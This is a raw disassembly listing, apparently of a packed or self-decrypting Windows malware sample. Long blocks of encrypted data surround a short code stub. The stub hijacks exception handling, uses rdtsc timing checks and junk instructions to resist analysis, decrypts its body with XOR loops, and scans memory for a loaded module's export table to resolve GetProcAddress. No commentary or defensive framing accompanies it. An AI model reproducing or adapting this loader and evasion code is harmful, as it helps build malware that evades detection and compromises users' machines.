26FD4543h, 20C0A8C2h, 0FA389ABFh, 44B87FBAh dd 571FC35Eh, 0D8F2CF0Fh, 4C60D5AEh, 7418D855h, 3B2DBA0Ch dd 70B0B902h, 0A5625876h, 0C01D3865h, 2D94A9AFh, 6C90A392h dd 86097A94h, 0EC8867B3h, 0A2856186h, 3EAEA388h, 3194CA81h dd 2487E084h, 0F5DFA39Fh, 78326FF7h, 79A3566Eh, 98D54EA2h dd 0AF64A124h, 77D8672Ah, 516A7A3Ah, 4F3EAF69h, 0F7D0DCA1h dd 0B8534342h, 0B1382D4Eh, 0B5CA92BCh, 2C40156h, 9DEA0348h dd 11D42AC1h, 8CC740C4h, 38BDCD51h, 6EF0A099h, 76A98A85h dd 0DF287713h, 0B2245126h, 32A5CD78h, 1A1C3527h, 5F0056Fh dd 86EB06EBh, 0A7EF1D20h, 0BDF1CFE6h, 0C42807F5h, 0E9FB5A12h dd 0B866B2E1h, 419A6001h, 4173F46Bh, 0BEE47072h, 6A07E105h dd 92EC1DEDh, 0A000139Fh dd 0D61B0E1Ah, 0AA0E33FDh, 82BA3A21h, 8FBEBA25h, 0C15F3247h dd 0BA740659h, 2AE76DDEh, 3B341F43h, 0A6FDC543h, 0A0C028C2h dd 7D8461BEh, 64817B3Fh, 5EB4E9B6h, 0BF9CA7B4h, 2295392Bh dd 1CA8A7AAh, 0EEAEE4A7h, 0F5F8660h, 25612E76h, 401DB865h dd 0AE9429AFh, 0EC942392h, 7F20E584h, 0D600875h, 0A17B1E7Bh dd 50B94F07h, 2A7CB17Eh, 0FC6FEB7Ah, 18B74E0h, 16B05ACAh dd 0DAD4F6A6h, 176C33AAh, 4D9C44DEh, 0EF88B005h, 8DA3FAA3h dd 74616BDFh, 4E54D156h, 0B822B652h, 32752FF3h, 653C974Ah dd 9B9E4AEh, 0F869D3BDh, 6F369C17h, 0B4280644h, 9437CDF6h dd 98096D97h, 39C4562Eh, 0ECD718D7h, 0C3AE7B97h, 303082A0h dd 0E7204DB4h, 0B21770E5h, 0FE2D0793h, 1814EE12h, 22CD0D0Ah dd 0CA858702h, 3C0591ADh, 7D20E355h, 56D50A01h, 0B640B9DEh dd 0BB03900Dh, 28E08A76h, 12EC9DFEh, 0B558809Eh, 935C174Ch dd 0B6015918h, 4620AD75h, 4C68D025h, 25142A7Ch, 3A58BE5Bh dd 0E73BEDDEh, 4CD8EE4Eh, 36C4C1E6h, 0C897BCB7h, 0F5436960h dd 4477F4E0h, 0D47E42EEh, 0D8892F37h, 4EE6B4AEh, 6060CF00h dd 3EC2EE59h, 0F5573B23h, 5A8CDC1Ah, 4498CFDAh, 0EA14BAE2h dd 6435A9BAh, 648C9DB7h, 6035FE21h, 7D8471C4h, 0F904CE75h dd 0AA7C356Eh, 9D0D5F7Ah, 0FB7659C6h, 6860CA0Eh, 0D6E92AC4h dd 0BC68D753h, 5364B166h, 1AD82B69h, 0EA65F8DBh, 0D9B3C55Ah dd 0D665E130h, 81D4C6A5h, 0A34C2D5Eh, 8E3C174Ah, 0D34E28F6h dd 6050D23Fh, 403F31FEh, 2401C29Fh, 789FCF36h, 0FFC0128Ah dd 0E215F9ABh, 0DC2A672Ah, 72262426h, 0CD8531EAh, 0FC1C3527h dd 2CA586B1h, 0D614E954h, 5810CA82h, 0C6893AA5h, 2408A733h dd 6204A106h, 0FC206373h, 6F0B8A01h, 0D4E8667Eh, 0BEF44DF6h dd 10403887h, 0AB9298E4h, 974207FAh, 0E26106ABh, 50E0CBDBh dd 4FDCC5D6h, 0A760C9CBh, 70719336h, 9ED093EBh, 480C5E65h dd 74AE4221h, 13CE59EFh, 0A0D012BCh, 80BFF17Eh, 6481811Fh dd 0A91F8FB6h, 58895737h, 32BCBDAEh, 9D10C1AAh, 86A7E566h dd 55AA7366h, 0DA8C5CE0h, 7297E4FCh, 0BEADBB13h, 37788892h dd 7573F275h, 7CB1730Fh, 5684E186h, 0F08EBFC2h, 56F9B72Eh dd 0BE788F43h, 18F1C9Eh, 163FFE8Dh, 90FCD0E7h, 399F477Ah dd 0A67408E2h, 10601B62h, 92EC092Ah, 0D9D144F0h, 4E449BE2h dd 0D9B8C6B9h, 0CAB352B5h, 0F3B76C20h, 0CFC004B1h, 0E0406B52h dd 0C149553Fh, 31327F8Ah, 9E24104Ah, 0EE3FF898h, 78EC7E96h dd 4C119B8Fh, 0F68FB726h, 0B5D71123h, 1A0C9C9Ah, 41A8F1Ah dd 6BE35663h, 0D8005A96h, 0C2084D0Eh, 6CB82D7Fh, 0AF7AA40Ch dd 258A0B12h, 6AECCC7Dh, 32E83F3Bh, 9575AF4Eh, 201BB342h dd 97E6DD5Eh, 0FCF8BE94h, 6261864Ch, 0D0E04BDBh, 0CFDC4DDEh dd 276049CAh, 0F371133Eh, 1ED013EBh, 89CD5D65h, 468067C2h dd 26FDBC43h, 0FF2801C2h, 0FD436A44h, 0E481FB3Fh, 0CEB469B6h dd 0BDC5E2B2h, 31145B8Bh, 0E10D2D52h, 0E0A4019Fh, 0DA60C809h dd 180C58B7h, 0C16FCF8Ah, 2E848012h, 18B0A392h, 753D92FBh dd 54EE6C61h, 738E798Fh, 0C09072FFh, 0A07FD1BEh, 844162DFh dd 57DF6F76h, 783263CFh, 0D8AD576Eh, 2C2A57CFh, 96CFD766h dd 6CE5993Ah, 505C9567h, 1BA216B2h, 4AD1AEA9h, 0BB50536Bh dd 0D64D2D4Eh, 8CDE066h, 7644117Fh, 1544EB42h, 0CEB9221Eh dd 3438AF03h, 6B37A936h, 0F1EE7B38h, 0B9C482D1h, 34D798D0h dd 39DBAB26h, 4FDA7ACAh, 1E99D2E1h, 84181F23h, 1A1CF916h dd 0F2D9531Ah, 0BDF6E0E6h, 0A88D40F5h, 1604B13Fh, 74108B02h dd 0C0FBC5D4h, 0C4C1237Fh, 0A41488F6h, 8CF8BAFFh, 0EE491FEEh dd 0BCE817D3h, 0A264F202h, 0AF0870E6h, 8A233A27h, 0D33005BBh dd 682B662Fh, 0F2307C6Ah, 0F2F5116Bh, 246331CAh, 493BB820h dd 9944AE35h, 8A9C15AEh, 30CCFFBAh, 0D33F2E3Dh, 48A0913Ah dd 73257C85h, 16F01756h, 169DED23h, 4F48D1A2h, 2D639A67h dd 0D4A1CB1Fh, 0EE943996h, 0FE9C5792h, 884F5D36h, 7CB18B0Fh dd 308E0A86h, 4A60343Ah, 3A45C9DBh, 0FCD3F97Ah, 18B70E0h dd 0D1F4F685h, 0D26F5D7Eh, 0E31C466Ah, 23EFFEEDh, 907059C2h dd 32D5CD75h, 9391DCA6h, 5E6D5DD3h, 0B850C352h, 0AF42D84Eh dd 1C71EBCFh, 0B64C0B46h, 934392C2h, 738D8C6h, 0B4281B7Eh dd 2E3CC9F7h, 8ED3B8B9h, 0B21D4548h, 0E44E4C4Ch, 0FE4C51A9h dd 3220BB22h, 42B7C3FFh, 71D10AB1h, 0DFAC1F10h, 68BB05D2h dd 0E9E4E7CDh, 5BF7C8F3h, 863DA583h, 80000B02h, 0E1E6817Eh dd 0E07D5435h, 15F4D9B4h, 0D4B83A3Ah, 0ED15E206h, 562B3715h dd 191D740Eh, 4065D61Dh, 4DDC55E7h, 0B4E1AB5Fh, 8ED419D6h dd 2FD676F2h, 899415E5h, 649B5CD3h, 0E6EF39EDh, 62682649h dd 9FBD95AEh, 0F4A83D32h, 9A3F50B7h, 75395796h, 0B2BC2DC6h dd 0DE249A21h, 38F11B6h, 70B0B92Ah, 63186069h, 44D8CF8Ah dd 2CE0B996h, 0DA3B7B65h, 55DA8D8Ah, 0AE4CCA09h, 0D9846196h dd 0C0819206h, 0AA71DD7Eh, 0D1331F7Ah, 32314724h, 2C5EC141h dd 0AD6C9122h, 2C56B5FFh, 0FEE13866h, 43608B20h, 0F960DDD5h dd 0CC2B9082h, 26601ADDh, 47AFB64Bh, 0E0F4B8C5h, 8F13175Ah dd 0F3CD0D04h, 6050A99Eh, 0C334973Dh, 247A5FBFh, 36472236h dd 8B020CDh, 0C47D2Eh, 57D798DEh, 0D666E99Bh, 56C86D22h dd 11E3DAEAh, 945AB78Fh, 665E7216h, 731CA911h, 47E54EC0h dd 2D683F05h, 920BA106h, 8A58h, 0A840C0FDh, 61FB5FEAh dd 0BEE40B8Eh, 0A7180F5Eh, 92ECBF6Bh, 78AE8AEAh, 249C74CDh dd 56E3DBF2h, 0CE7F2D8Eh, 995B5025h, 0EC4DB6Eh, 0C3DBF6D2h dd 61C36189h, 0CCC856D1h, 23FD4D2Dh, 0A0D0697Ah, 8BB190B1h dd 0F1BBFFBAh, 5EA4ABCEh, 0B78852D4h, 0CE29B28Bh, 97A8A7AAh dd 458F93E6h, 96482B96h, 0E3639A6Ah, 0D4DAF727h, 4A113696h dd 9B902392h, 92CEB10Bh, 140DF48Ah, 0DD84F1C4h, 4CC7E082h dd 2AB13771h, 53439F7Ah, 3AF7867Eh, 6B707372h, 956F5FAEh dd 0C4ED447Eh, 0F4642124h, 48D5E432h, 855C151Ch, 7466DDCFh dd 8ED18356h, 38E7465Dh, 0BEA5AD4Eh, 3048974Ah, 62C18EB9h dd 60406B42h, 4F334000h, 0B4383FB1h, 0B5356FBDh, 60602771h dd 8DD30EDBh, 1E905A13h, 3151D136h, 729C3E21h, 9F1FA50Eh dd 408CD62h, 0ACF0FC9Fh, 0D89B6302h, 80D0C835h, 0A47A371Ah dd 0D4E4A43Dh, 0E9720B12h, 6AFCF5C3h, 0BCCFAD8Ah, 3EF4C9E9h dd 0A30CFD7Fh, 11EEB62Fh, 79D397A8h, 0E6F43302h, 14635797h dd 35EDBACEh, 0C5C40B9Eh, 117023Dh, 68929B57h, 0D7478DCEh dd 4CD895B2h, 0C930522Eh, 2069CA3Dh, 7F3C95BEh, 0F8FF54B4h dd 998F60C4h, 0F4325CBAh, 0FB53C251h, 621AA2A5h, 0BA2FEE59h dd 0F4077A86h, 0A59CE5B7h, 0AF773065h, 0ADE38D4h, 0F890A3F2h dd 894CBEC0h, 690F5386h, 0D6942342h, 8240CE0Bh, 13F1356Eh dd 947836F2h, 3C0C8C75h, 0CD16F362h, 944793CBh, 177C8569h dd 60A2BD24h, 91A77399h, 0FA5C850Dh, 0E4586F5Fh, 91A81FDFh dd 4707800Ch, 0B27253DBh, 93A0D64Ah, 775E8449h, 3410EB42h dd 0B556FD54h, 0AE62AC5h, 0DEB1A926h, 0DB89C6Dh, 1A2C7D2Fh dd 23D783A6h, 0C62440CEh, 0C4456822h, 0FF704C58h, 0F17B6A49h dd 17609064h, 0EDEFE353h, 421C8F42h, 123A22F5h, 938DA116h dd 10C956h, 0EAFC6C16h, 809D0CFAh, 0F1912297h, 0DA955D85h dd 0E285759Dh, 0A8175BAh dd 1819D8Fh, 0B8B7DB87h, 0C5232D83h, 24D8BC32h, 5CB1CAD6h dd 97A4F0B7h, 909C08BCh, 0A0A121A3h, 0B6A126A3h, 48FFC395h dd 9854EA41h, 27B8FFBAh, 3DD5ABD3h, 18C0A6D9h, 5BDAD4DCh dd 79CFC2C6h, 244CC6A6h, 185F844Ah, 0DA9C6586h, 0ACDB2AC9h dd 0CBF357F7h, 0F1E44CDCh, 0F0DC74E8h, 0E181E3h, 56E186E3h dd 0A77F23D5h, 7E2C4A81h, 29E81AF7h, 9A1E8966h, 0BF711922h dd 0EC86C891h, 80E1477Ah, 80F1CE42h, 0BA600B5Ch, 32E1889Eh dd 3458FF1Bh, 0FBAB8906h, 3840FEC2h, 264CAC26h, 0D22C34Ah dd 0A2D17E11h, 0B4407B00h, 356B5154h, 0A47A6BAFh, 8AF0AA36h dd 0CA7CA6CDh, 0E7D3FD3Eh, 5C38D948h, 0F3A91279h, 3030FA6Ah dd 7C895A48h, 87189F24h, 6A1B86EEh, 0D81063A9h, 8054C887h dd 0AC62371Ah, 3491DE50h, 5001B3Ch, 0CE78FA3Eh, 7FF8DFFAh dd 54A49936h, 299AE3F1h, 12EC9D86h, 6917D12Ah, 0E6F44FA4h dd 0DF1FA361h, 0BADA425Ah, 0F85DA6DAh, 3D40994h, 6892635Fh dd 0A5960CEh, 1DC8C788h, 66C4AB94h, 1EAE3E3Dh, 0F23F95AEh dd 213C7045h, 0B4B469B3h, 9405ACB2h, 4DAC2DECh, 8C964D3Fh dd 795C92A6h, 751E7FADh, 0DF15E59Eh, 44888DEAh, 0ED9770A5h dd 72C1F3C3h, 0B773DC8Ah, 0EC9835D6h, 0E8C2F479h, 54B92h dd 0AFE6B171h, 5D4B1F7Ah, 3C008CFFh, 3921F362h, 5273B53Fh dd 0C338C765h, 365A3FF3h, 1FA01E62h, 0FA59D6DAh, 9CDDE65Ah dd 0D544914h, 0B822A8EAh, 9A07A64Eh, 0B5CC92BDh, 76440156h dd 6635CB42h, 5A54503Dh, 0E60BBF2Ah, 0EFC36835h, 8DB972C5h dd 0F23C3FAAh, 0DC01E892h, 0FA6FDA26h, 0A048BE21h, 482F250Eh dd 75EFCE19h, 0EB9D18E1h, 5800A16Eh, 9BBC2CDh, 19EB4E0Ch dd 191CF28Bh, 314C8B5h, 2B973C2Eh, 55285CD2h, 0D78316CCh dd 0B584CA9Ch, 93E0676Dh, 3763E798h, 72A67ADAh, 0DDF099E1h dd 0CD238D9Ah, 1F198C03h, 1E96E953h, 0AC5B40D2h, 22FF7DEAh dd 0CC70D545h, 3D0741C6h, 2DCBC00Dh, 9AFD5D03h, 0AB3303BAh dd 62182085h, 74B6A1D3h, 1EAECAD4h, 40940D8Ah, 28987DD2h dd 0F09CA6D6h, 137F8DEBh, 81A54E11h, 0DA947CCEh, 0DBC31E99h dd 7830DDCh, 937708B9h, 1B9E20Dh, 4FC385CBh, 0D58393FAh dd 572FA285h, 7A7BC723h, 178F8C69h, 0E12F0A53h, 0ACEC4858h dd 9B9BCE99h, 0DF344832h, 85598151h, 0BF6B10A5h, 0B1AAF4BEh dd 0D040B6ADh, 0DDB351B4h, 0F3B6B6A2h, 1AC08EB9h, 0D3BF94BCh dd 0CA2ABDECh, 0D7D03F3Ah, 76CBD6C9h, 88301332h, 61C17C73h dd 0B528F71Eh, 4624D2DCh, 0BB124446h, 0A5EDDABh, 2691EB1Ah dd 0A32AF870h, 3B956C48h, 490C4D0Dh, 720B0B54h, 0C63FA060h dd 53850447h, 9DFCF5FDh, 74F8C9B9h, 0BBFBC9F6h, 28F0B034h dd 10B0DE18h, 0FF5403E5h, 0A56F71E6h, 704066EAh, 3ED3E57Eh dd 0A4D82C74h, 0AEF439EBh, 0DB540CF2h, 0E9CCEDCDh, 4CC81F41h dd 67D222C6h, 0DF2F232Ah, 0B6319641h, 0F7B86FF8h, 9ED5EA78h dd 8CD1D0B2h, 4C37D5AEh, 1EA7D855h, 86A412DCh, 32605E21h dd 0D19CE58Eh, 0E13C7D8h, 5D559286h, 0F3509096h, 8B448E8Bh dd 690167C0h, 0D6942306h, 788C0181h, 0AA7D357Eh, 72C6F72Bh dd 0EB44F689h, 6860CAF0h, 0E75CFDDFh, 3C78FEE9h, 0EF9A910Ch dd 0F874E33Ah, 5A363FAh, 7057BDDFh, 0FFB68A94h, 0A869C7C7h dd 55A9C64Eh, 9C7193CFh, 76440146h, 97629F43h, 5A0551BBh dd 3438BC3Ah, 9F38DC36h, 18091797h, 0DD3822Eh, 5D228CD1h dd 0D61DD5ABh, 0B0203B22h, 9A1A4D16h, 0EC410F1Ah, 6E14F910h dd 0BE460B4Ah, 0C78632F1h, 2C188E76h, 6A2E2580h, 88009B3Bh dd 0FAC5097Bh, 2318BDFAh, 0AECDCD73h, 0A8F03BF2h, 12E568EEh dd 6CD17957h, 0A390F0E6h, 69645E15h, 3ADCC5CEh, 3FACA7DAh dd 37A82456h, 8CD583C2h, 9F71ED7Eh, 0C9C847F3h, 0B44E6B2h dd 0A0D012BCh, 7D2261BBh, 64817B3Fh, 5EB4E9B6h, 0C8B9A7A2h dd 2295C113h, 95DFA5AAh, 44603425h, 18A07BB2h, 25639738h dd 3B650C72h, 0ACE5D169h, 51B2392h, 829C4FF2h, 2E086A89h dd 0D6CE196h, 4F7F347Eh, 2A7EE4FAh, 6CCD147Ah, 75749934h dd 36734F2Ch, 2D910186h, 87EA4895h, 27643164h, 90003F28h dd 84D7E55Eh, 1E5BB908h, 5E2EDA42h, 1D446A5h, 224CAD5Eh dd 183DB74Ah, 0B48C3CCFh, 55CD6B52h, 0CA2C6CAEh, 0A450B2B1h dd 3AC72926h, 8254AA65h, 0C7A1FD2Eh, 5C38F72Ah, 469574D5h dd 94D3B9C1h, 239820E9h, 4188F0Ah, 6A1B5916h, 0D81063BCh dd 2A243EF1h, 53F7DADBh, 0D4BCB48Dh, 52850B12h, 6A6471F1h dd 0E173DFFAh, 3EE48B8Eh, 0A9E0F979h, 128CB9A4h, 0B6C367EAh dd 0D5E602EEh, 0C492582Bh, 0AAB4C8E5h, 29532FCAh, 8EC409BEh dd 445B55A0h, 0A696EEAh, 4CC8C7DAh, 36AC6645h, 0ABC0ABC2h dd 40BD9DC4h, 734F7CB2h, 5231E241h, 3FB043F0h, 0A295B92Bh dd 9CA867AAh, 71A665A6h, 7CD2F8BAh, 0EF15D5B7h, 44888D5Eh dd 2FBCCA1Dh, 9C1554A2h, 428C9DB7h, 9888778Ah, 879C9684h dd 3F7C606Ah, 0A6976C81h, 0BF506C79h, 28250504h, 312F5781h dd 6BFC68E3h, 81E1C77Ah, 2674F3AEh, 4E3F3F91h, 77CEB451h dd 0E45950DDh, 4CC16356h, 0CD50536Bh, 0DA9E4448h, 0EA5A231Ch dd 9EAD51CFh, 9FBF3165h, 46765E64h, 0C328F539h, 0E0D2DB3h dd 8309332h, 0F76DF00Eh, 51A1745Fh, 0C63413E2h, 0A048BE21h dd 3D9F250Eh, 84180F72h, 4657D216h, 5843649Bh, 0C7FBCD0Eh dd 2C18884Ah, 1604A107h, 43C78C76h, 4A5CD5F6h, 507DA85Ah dd 0BEF459CFh, 0DCE033F2h, 0C9044FE9h, 2617F81Dh, 24207C6Dh dd 5503DBF2h, 0D1F48E57h, 0E45524D7h, 0EDD48994h, 73D368D0h dd 673B4585h, 0CCD86E4Eh, 0B6C441C5h, 254B3FB6h, 8AAC5776h dd 360872B9h, 0DBB7E9A6h, 48A0911Eh, 7827B5AFh, 602D2CBAh dd 3FA481E4h, 0F3D373E8h, 0DB942F17h, 0A71B5FD8h, 2B1F39CEh dd 98806116h, 82A59DE6h, 64CAF68Ah, 6C7E0DFh, 79025E08h dd 0AF8BB56Eh, 1468A6FEh, 0DE748976h, 65737506h, 0D27C4D06h dd 399F47DCh, 0A67408E2h, 90621B62h, 0BCA2112Bh, 5DDC6AADh dd 4E54D946h, 3E25C356h, 1BCF18C4h, 89BF975Ah, 0F654B8C2h dd 0E0402B42h, 0CDB65E4Bh, 0B692FD38h, 75C3CBE0h, 0BA37993Bh dd 0A42E57ECh, 8E1B10C8h, 22065A42h, 0B378B9ADh, 0A5EF9A3h dd 80178F1Ah, 11EB83A9h, 9A68D6EDh, 57F34D1Eh, 0AC1809B8h dd 0D47094F9h, 15FF0B12h, 6AECCBD8h, 16985277h, 0AB79C9E6h dd 28E0F19Ah, 1286CFBFh, 0BEB43215h, 731B71F6h, 0D0F06544h dd 0F880F021h, 31272FCAh, 8EC427F0h, 3998B65Fh, 0D733EDDEh dd 4CD89592h, 94513E90h, 0A3C0BBFCh, 1AFEC91Bh, 1C7B7FBAh dd 0DEB469B6h, 49B139EFh, 0A294B243h, 93587FAAh, 93249467h dd 0B025FBB2h, 0A554665Dh, 0C159C06Ah, 2E84AC16h, 18809E51h dd 1EF98DA4h, 0C8F4F6ECh, 0A3F50D8Ah, 4682B91h, 0DF83CA81h dd 6ECDF77Fh, 0AC9CF689h, 98F0C8Dh, 2A412240h, 847AF33Ch dd 2664B143h, 0EFC57302h, 0C3297AA1h, 0D47C2BD1h, 8F1CECDBh dd 0E8DB4342h, 98CD4B46h, 0A93B154Ch, 76446910h, 0A4CBEBBDh dd 1A6ED554h, 0ACA2AC5h, 0DAB7A926h, 540E123Ah, 87704211h dd 0D8EEE429h, 39DE33CEh, 4F5FD3DDh, 597DDAE1h, 84187BA2h dd 0D6A51216h, 5810E33Dh, 420CD0E6h, 2C28750Ah, 160491BEh dd 106302h, 0CE3E75FEh, 0D57DE7FAh, 0BD1C49F6h, 6AF033F2h dd 0C6611DC2h, 52250BCEh dd 1AE40965h, 5008BBFBh, 0B1DCC5DEh, 79E88B8Eh, 0E355835Dh dd 0F8C0BAB4h, 1D2C8A26h, 0C80A3635h, 0B0C743C6h, 0BFC52CC3h dd 7FF08C75h, 7C15FFCBh, 8B010010h, 0FFh, 1575h dup(0) ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame public start start proc near nop nop cld push ebp mov ebp, esp call sub_3144A01D clc nop call sub_3144A0C0 mov ebp, 12FFC0h ; DATA XREF: sub_3144A01D+6w cld jmp loc_3144A059 start endp ; =============== S U B R O U T I N E ======================================= sub_3144A01D proc near ; CODE XREF: start+6p push dword ptr fs:0 mov dword ptr ds:loc_3144A012+1, ebp stc jmp short $+2 mov edx, edx clc cmc cmc mov fs:0, esp xor ecx, ecx push 400h push ecx push ecx push 80000000h push ecx push ecx push 4000h push ecx push 80000000h push ecx call ds:dword_31428090 ; GetProcAddress loc_3144A059: ; CODE XREF: start+18j cld stc sub eax, eax loc_3144A05D: ; CODE XREF: sub_3144A01D+46j dec al or al, al jz short loc_3144A067 jnz short loc_3144A05D jmp short sub_3144A0CE ; --------------------------------------------------------------------------- loc_3144A067: ; CODE XREF: sub_3144A01D+44j nop clc nop sub ebx, ebx sub ecx, ecx stc mov cl, 0EAh jmp short $+2 cld loc_3144A074: ; CODE XREF: sub_3144A01D+5Cj lea ebx, [ebx+1] mov ecx, ecx loop loc_3144A074 clc mov eax, eax clc call sub_3144A085 stc sub_3144A01D endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144A085 proc near ; CODE XREF: sub_3144A01D+62p pop edi cmc cmc add edi, 55h xor ecx, ecx or ecx, 2990h clc push edi xchg ebx, ebx xchg ebx, ebx loc_3144A09C: ; CODE XREF: sub_3144A085+24j call sub_3144A0CE cmc add edi, 1 dec ecx cld or ecx, ecx jnz short loc_3144A09C pop edi cld cld mov ebx, [ebp-8] mov fs:0, ebx cmc jmp short $+2 cld nop leave clc jmp edi sub_3144A085 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144A0C0 proc near ; CODE XREF: start+Dp arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_3144A0C0 endp ; sp-analysis failed ; --------------------------------------------------------------------------- clc ; =============== S U B R O U T I N E ======================================= sub_3144A0CE proc near ; CODE XREF: sub_3144A01D+48j ; sub_3144A085:loc_3144A09Cp xchg al, [edi] stc stc xor ax, bx mov [edi], al retn sub_3144A0CE endp ; --------------------------------------------------------------------------- cld call $+5 mov eax, [esp] cld mov [eax+32C7h], ebx mov ecx, [eax+297Fh] mov ebx, [esp+4] and ecx, 10000000h jz short loc_3144A125 pop ecx mov [eax+32CBh], esi mov cl, [eax+2983h] mov [eax+32CFh], edi cmp cl, 0E8h jz short loc_3144A11A mov ebx, [eax+2985h] jmp short loc_3144A123 ; --------------------------------------------------------------------------- loc_3144A11A: ; CODE XREF: UPX2:3144A110j add ebx, [eax+2984h] mov ebx, [ebx+2] loc_3144A123: ; CODE XREF: UPX2:3144A118j mov ebx, [ebx] loc_3144A125: ; CODE XREF: UPX2:3144A0F8j push ebp mov ebp, eax sub dword ptr [esp+4], 80DEh sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+103990h] mov ecx, 0 rep movsb call sub_3144A1FE mov ecx, eax call sub_3144A1FE sub eax, ecx jz short loc_3144A1D0 cmp eax, 100h ja short loc_3144A1D0 and ebx, 0FFFFF000h loc_3144A164: ; CODE XREF: UPX2:3144A173j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_3144A175 loc_3144A16D: ; CODE XREF: UPX2:3144A182j sub ebx, 100h jnz short loc_3144A164 loc_3144A175: ; CODE XREF: UPX2:3144A16Bj mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3144A16D add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_3144A18F: ; CODE XREF: UPX2:loc_3144A1A3j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_3144A1A3 cmp dword ptr [eax+5], 6441636Fh jz short loc_3144A1A8 loc_3144A1A3: ; CODE XREF: UPX2:3144A198j loop loc_3144A18F pop ecx jmp short loc_3144A1D0 ; --------------------------------------------------------------------------- loc_3144A1A8: ; CODE XREF: UPX2:3144A1A1j sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+10113Fh] mov dx, [eax-17h] ; CODE XREF: UPX2:3144A228j call sub_3144A203 jmp short loc_3144A218 ; --------------------------------------------------------------------------- loc_3144A1D0: ; CODE XREF: UPX2:3144A155j ; UPX2:3144A15Cj ... mov eax, [ebp+103984h] and eax, 10000000h jz short loc_3144A1FC mov edi, [esp+4] lea esi, [ebp+103988h] lodsd mov ebx, [ebp+1042CCh] stosd movsb mov edi, [ebp+1042D4h] ; CODE XREF: UPX2:3144A238j mov esi, [ebp+1042D0h] loc_3144A1FC: ; CODE XREF: UPX2:3144A1DBj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3144A1FE proc near ; CODE XREF: UPX2:3144A147p ; UPX2:3144A14Ep rdtsc retn sub_3144A1FE endp ; --------------------------------------------------------------------------- db 0EEh, 0BEh ; =============== S U B R O U T I N E ======================================= sub_3144A203 proc near ; CODE XREF: UPX2:3144A1C9p push ebx mov ecx, 2845h mov ebx, edx loc_3144A20B: ; CODE XREF: sub_3144A203+11j xor [eax], dl sub dl, bl xchg bl, bh inc eax xchg dl, dh loop loc_3144A20B pop ebx retn sub_3144A203 endp ; --------------------------------------------------------------------------- loc_3144A218: ; CODE XREF: UPX2:3144A1CEj push es mov dl, 0 add [edx], dl add [eax-15h], ecx inc ebp mov ds:2E346900h, eax add cl, ch jle short near ptr loc_3144A1C5+2 outsd mov byte ptr [ebx], 0D7h xchg eax, edx stosb setalc setalc xor ds:0DFFC5AEAh, dl jl short near ptr loc_3144A1F0+5 inc ecx push esp push edi daa xor al, cl cmp [edx-6AD6D7D7h], dl pop edx and eax, 208EC41Bh retn 0D99Ah ; --------------------------------------------------------------------------- db 0B4h dd 5DBFF6E6h, 0CF7D367Eh, 3232BB5Ah, 9764F03Dh, 0CD01D089h dd 0CCBCB4B4h, 50D3CD56h, 0DB3417E2h, 0A7E74D82h, 49C3CAD5h dd 60702060h, 618B62F7h, 68A82517h, 0F9FB173Ah, 5F12ECEh dd 38A14D16h, 86382664h, 0EC498DC7h, 1005B16Eh, 0EFA4D287h dd 186DC5B1h, 0CECDACFh, 8590EB7Dh, 9734D232h, 884DD2E3h dd 0B9FFDA6Ah, 0A0B04B06h, 0A102B5B2h, 0A8F8740Ah, 1EB963FBh dd 3D307E20h, 24410EF7h, 35B14566h, 2CA2C437h, 28E0CFAEh dd 44E4015Fh, 0B69D79A9h, 8D2C1A24h, 545F91D6h, 547412B6h dd 0B28CD10Dh, 347F19EAh, 0E8E08ECEh, 5A32A77Bh, 440A606h dd 64C2A48h, 46E5515Eh, 0F19422BCh, 163CB966h, 0EBDC3AC8h dd 10000B63h, 6BAF4202h, 8447D8Fh, 8C81CB5Ah, 9D90DE6Eh dd 84A60E37h, 0E77D25C6h, 0BC10D908h, 284A2285h, 291DA201h dd 3873A3C3h, 2727997Ah, 20E76762h, 0E3C8353Ch, 39F8F58Eh dd 8A89850Ah, 0C340EE10h, 4E1A296h, 4A178279h, 0A63B8A9Ah dd 38D164BEh, 54F496E2h, 5918166Eh, 0EAA9652Ah, 0E5600E70h dd 6600ADB2h, 2A82694h, 0ECA4FABAh, 1AF02ADEh, 0F8FC7302h dd 28395C71h, 0FD5CBB22h, 0B615C16Eh, 6CA4D2ACh, 88C946BCh dd 32DA5F25h, 95F84EEEh, 0FD34D222h, 98585417h, 0FF25DA00h dd 5FAA3484h, 34FA4827h, 6B198DD6h, 125A5779h, 0BF306E0Eh dd 3456C6C6h, 0B87E9E66h, 68D2FA8Ah, 0C08C32EAh, 7A96972Dh dd 7D8586E6h, 4C3C1DCCh, 6DDD470Dh, 54642CDCh, 300B9837h dd 5CBC18DFh, 0DE12234Dh, 6B0422E2h, 0E82AA692h, 0AEC9A13Ah dd 0F70BE60h, 0F11B33F2h, 0F8A88E7Dh, 4206BF41h, 70FFBEFEh dd 0ACA1CD13h, 8348D60Fh, 9C528CDFh, 11E0317Eh, 0AD9BD72Dh dd 9553D6D6h, 9CEC6420h, 51DFC4EDh, 98C1ED33h, 0A368F66Fh dd 0BCB2B8F7h, 0CFB90D9Eh, 315B73B3h, 38E8CFAFh, 0BC1DC2E2h dd 8FD732Eh, 4F64926Dh, 0BE886CB9h, 0C8DC7543h, 3AD3EF3Dh dd 830D91A2h, 4072166Ch, 0C9DF2FA7h, 79D91E5Eh, 6984A272h dd 97566B92h, 47AA5545h, 70BD2A53h, 9214B202h, 7C7FBB8Dh dd 71B888E1h, 90BDCAFBh, 8DC26E92h, 0B6320B4h, 0F90EC818h dd 907A9A75h, 14463E4Ah, 0F294DD46h, 76B8516Ah, 0A0A0368Eh dd 64AEEAB2h, 0A6823487h, 0E29915AAh, 0E8307E20h, 5C1436C1h dd 0B878048Ah, 3CF62E01h, 80AAB225h, 468E02B8h, 0A008ECA4h dd 4C2C78F6h, 0BA018E54h, 0C18B429Dh, 